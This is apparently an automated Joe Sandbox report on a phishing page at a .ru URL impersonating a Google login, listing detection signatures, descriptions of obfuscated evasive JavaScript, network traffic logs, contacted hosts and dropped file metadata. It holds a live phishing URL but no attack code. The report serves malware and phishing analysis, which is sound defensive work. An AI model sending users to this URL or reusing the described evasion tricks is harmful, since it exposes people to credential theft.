Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://xucr.vafdcekgwp.ru/aIDt6/

Overview

General Information

Sample URL:https://xucr.vafdcekgwp.ru/aIDt6/
Analysis ID:1591128
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish44
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Detected non-DNS traffic on DNS port
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • chrome.exe (PID: 3816 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5896 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=2028,i,6066917806867256690,5191470454520669849,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 4320 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://xucr.vafdcekgwp.ru/aIDt6/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_70JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: https://xucr.vafdcekgwp.ru/aIDt6/Joe Sandbox AI: Score: 9 Reasons: The brand 'Google' is classified as 'wellknown'., The legitimate domain for Google is 'google.com'., The provided URL 'xucr.vafdcekgwp.ru' does not match the legitimate domain for Google., The URL uses a '.ru' domain extension, which is not typically associated with Google., The URL contains random characters and does not resemble any known Google subdomains or services., The presence of a seemingly random subdomain and domain name is a common tactic in phishing attempts. DOM: 1.1.pages.csv
    Source: Yara matchFile source: dropped/chromecache_70, type: DROPPED
    Source: https://xucr.vafdcekgwp.ru/aIDt6/Joe Sandbox AI: Page contains button: 'Submit' Source: '1.1.pages.csv'
    Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://xucr.vafdcekgwp.ru/aIDt6/... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain (Google login page) after a delay. These behaviors indicate a high likelihood of malicious intent, such as attempting to bypass security measures and potentially steal user credentials.
    Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://xucr.vafdcekgwp.ru/aIDt6/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. While the script may have a legitimate purpose, such as displaying a CAPTCHA, the use of obfuscated code and interactions with untrusted domains raise significant security concerns. Further investigation is warranted to determine the true nature and intent of this script.
    Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://xucr.vafdcekgwp.ru/aIDt6/... This script demonstrates multiple high-risk behaviors, including dynamic code execution via the Proxy object and eval, potential data exfiltration, and obfuscated code. The combination of these factors indicates a high likelihood of malicious intent, warranting a maximum risk score of 10.
    Source: https://xucr.vafdcekgwp.ru/aIDt6/HTTP Parser: No favicon
    Source: https://xucr.vafdcekgwp.ru/aIDt6/HTTP Parser: No favicon
    Source: global trafficTCP traffic: 192.168.2.5:50562 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.5:50584 -> 1.1.1.1:53
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /aIDt6/ HTTP/1.1Host: xucr.vafdcekgwp.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xucr.vafdcekgwp.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: xucr.vafdcekgwp.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://xucr.vafdcekgwp.ru/aIDt6/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkY0eGxOVVRGdVJUTEZRMnVnQmdLblE9PSIsInZhbHVlIjoicVJXbFcwc0N0QnlzM25ET3J4ZmhvWXExSHdQK2h4ZCt2Z0ttQlBraVMxblNTdHRuS0JUVDczSEVHb2pzS2dZaFFnTVBWc09WRmVlbXhObkpuUWpZNEYwZEVrZ3ErTndaSmpEb1E2eGFmL1lQNVZWRUpLR3VLeEh3cFI2SU94MkYiLCJtYWMiOiJjMTFhMTE1YjlhMDQ0NmNkMzMxMTk5NzI0YzRlNmYxNDI5MTVkYTk4ODY0ZWZjNmYyNGZmZjBhZTRlZjZmMGRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InJObkQ4YlBSQXdnKzY5S3JPZ2xSS2c9PSIsInZhbHVlIjoiOUlpMnBDL21PSnVVSVhYakQxSWF1dVFOYVV4eW9ZZGlSQkJJK3ZKemxlQTRjTVNIa014cnNvMDJPZ3BDR0tYSm5NWGs4R09NVi8wODFJd1pKT0hwejNUMnQ2U3dmZkJkbThnWUk2VWtxdkZzN3BwN1FUenZjSzBPREczL0haOE4iLCJtYWMiOiIxZGEwM2I5ZDA0NzkxMWM2ODU1YzhjNjY2OWI5YWNhZjJmY2ZiZDVkMjRlZGExMzI5YWJlZWZhOWVkNDIwNDk3IiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /5f15081919fdf673994ab5fd/656e7a8eaa7a23c65aeb7444_Gmail-In-App-Screenshot-(1080p).webp HTTP/1.1Host: cdn.prod.website-files.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://xucr.vafdcekgwp.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /5f15081919fdf673994ab5fd/656e7a8eaa7a23c65aeb7444_Gmail-In-App-Screenshot-(1080p).webp HTTP/1.1Host: cdn.prod.website-files.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: xucr.vafdcekgwp.ru
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: cdn.prod.website-files.com
    Source: unknownHTTP traffic detected: POST /report/v4?s=fcnvMAToCQrOmRQyOYbXmsU2EAzbdRYbCzZrvmJ1iTZa7mnMVFCbodu0qwW3LHRV1ihUIPf5Ux9KGPhhnopJ0Tmu5bivj51%2B5Rxh%2BhrZsotBNRPmV%2BeaRovDIy0y5A%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 430Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 17:00:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fcnvMAToCQrOmRQyOYbXmsU2EAzbdRYbCzZrvmJ1iTZa7mnMVFCbodu0qwW3LHRV1ihUIPf5Ux9KGPhhnopJ0Tmu5bivj51%2B5Rxh%2BhrZsotBNRPmV%2BeaRovDIy0y5A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=7959&min_rtt=5452&rtt_var=2954&sent=170&recv=119&lost=0&retrans=0&sent_bytes=179414&recv_bytes=17507&delivery_rate=1536138&cwnd=257&unsent_bytes=0&cid=38bdddedf3e3bcd0&ts=82512&x=0"CF-Cache-Status: HITAge: 9318Server: cloudflareCF-RAY: 901f2f28ea2ade95-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1534&rtt_var=614&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1899&delivery_rate=1903520&cwnd=245&unsent_bytes=0&cid=e259585100caa887&ts=2055&x=0"
    Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 50609 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50814
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50615
    Source: unknownNetwork traffic detected: HTTP traffic on port 50615 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50814 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50609
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: classification engineClassification label: mal64.phis.win@16/16@14/8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=2028,i,6066917806867256690,5191470454520669849,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://xucr.vafdcekgwp.ru/aIDt6/"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=2028,i,6066917806867256690,5191470454520669849,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
    Browser Extensions
    1
    Process Injection
    1
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Registry Run Keys / Startup Folder
    1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://xucr.vafdcekgwp.ru/aIDt6/0%Avira URL Cloudsafe
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://xucr.vafdcekgwp.ru/favicon.ico0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      xucr.vafdcekgwp.ru
      104.21.64.1
      truetrue
        unknown
        code.jquery.com
        151.101.194.137
        truefalse
          high
          cdn.prod.website-files.com
          104.18.161.117
          truefalse
            high
            www.google.com
            142.250.186.132
            truefalse
              high
              NameMaliciousAntivirus DetectionReputation
              https://xucr.vafdcekgwp.ru/favicon.icofalse
              • Avira URL Cloud: safe
              unknown
              https://code.jquery.com/jquery-3.6.0.min.jsfalse
                high
                https://a.nel.cloudflare.com/report/v4?s=fcnvMAToCQrOmRQyOYbXmsU2EAzbdRYbCzZrvmJ1iTZa7mnMVFCbodu0qwW3LHRV1ihUIPf5Ux9KGPhhnopJ0Tmu5bivj51%2B5Rxh%2BhrZsotBNRPmV%2BeaRovDIy0y5A%3D%3Dfalse
                  high
                  https://xucr.vafdcekgwp.ru/aIDt6/true
                    unknown
                    https://cdn.prod.website-files.com/5f15081919fdf673994ab5fd/656e7a8eaa7a23c65aeb7444_Gmail-In-App-Screenshot-(1080p).webpfalse
                      high
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      104.21.64.1
                      xucr.vafdcekgwp.ruUnited States
                      13335CLOUDFLARENETUStrue
                      104.18.161.117
                      cdn.prod.website-files.comUnited States
                      13335CLOUDFLARENETUSfalse
                      151.101.130.137
                      unknownUnited States
                      54113FASTLYUSfalse
                      239.255.255.250
                      unknownReserved
                      unknownunknownfalse
                      142.250.186.132
                      www.google.comUnited States
                      15169GOOGLEUSfalse
                      151.101.194.137
                      code.jquery.comUnited States
                      54113FASTLYUSfalse
                      35.190.80.1
                      a.nel.cloudflare.comUnited States
                      15169GOOGLEUSfalse
                      IP
                      192.168.2.5
                      Joe Sandbox version:42.0.0 Malachite
                      Analysis ID:1591128
                      Start date and time:2025-01-14 17:59:41 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 3m 4s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:browseurl.jbs
                      Sample URL:https://xucr.vafdcekgwp.ru/aIDt6/
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:7
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal64.phis.win@16/16@14/8
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 142.250.184.227, 172.217.16.206, 74.125.206.84, 142.250.185.206, 142.250.184.206, 172.217.18.110, 142.250.185.106, 142.250.186.138, 142.250.185.138, 142.250.186.42, 142.250.185.170, 172.217.16.202, 142.250.186.170, 142.250.185.202, 142.250.185.74, 142.250.185.234, 172.217.18.106, 216.58.206.74, 172.217.18.10, 142.250.184.234, 216.58.212.170, 142.250.186.74, 2.22.50.131, 2.17.190.73, 199.232.214.172, 142.250.186.174, 142.251.40.206, 74.125.0.74, 142.250.181.227, 2.23.242.162, 13.107.246.45, 4.175.87.197
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, r5.sn-t0aedn7e.gvt1.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, r5---sn-t0aedn7e.gvt1.com, clients.l.google.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: https://xucr.vafdcekgwp.ru/aIDt6/
                      No simulations
                      No context
                      No context
                      No context
                      No context
                      No context
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 16:00:40 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2677
                      Entropy (8bit):3.9761512360744256
                      Encrypted:false
                      SSDEEP:48:8jd9TlRiMHHidAKZdA19ehwiZUklqehTy+3:83LiUsy
                      MD5:C1B4B9B6B9829A22935B903E04B9DE55
                      SHA1:A0B4C3FEA504D1E29616147EBDDCFC1F93CF63D5
                      SHA-256:549D57B5E338007A51A626A3C14BE8AE0A90CC4DE59D02DA0087D0174AD7A5D6
                      SHA-512:333A91EECF80EF4BF093474A6E510C9E968A507BF5EFC8F7A1B9B8598DF69FB09F7DD61DAF87FE8AB2592EC11CB8E905B5CEFB0DD26EF14854D6C8499B0F0521
                      Malicious:false
                      Reputation:low
                      Preview:L..................F.@.. ...$+.,....]...f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........I.Sm.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 16:00:39 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2679
                      Entropy (8bit):3.9886359604120436
                      Encrypted:false
                      SSDEEP:48:80d9TlRiMHHidAKZdA1weh/iZUkAQkqehcy+2:86Lim9Qxy
                      MD5:4800BA2ABF5293238D7DEC6545BE3548
                      SHA1:7EBB01BC703D033A9C28872B134924686B2EBAD2
                      SHA-256:A1ADE94EAF4AFF86119F1C928379F2094AFD4401833ADEDF2CF1014603032011
                      SHA-512:4605015B39D86333FDCD53CE1442EA72B752B8D00675D8D468281401B146152564D0743AC1DA42E28F25A8BC10FA2C0C51F6EC7EE75C7A6BDE11C2987B65F4EC
                      Malicious:false
                      Reputation:low
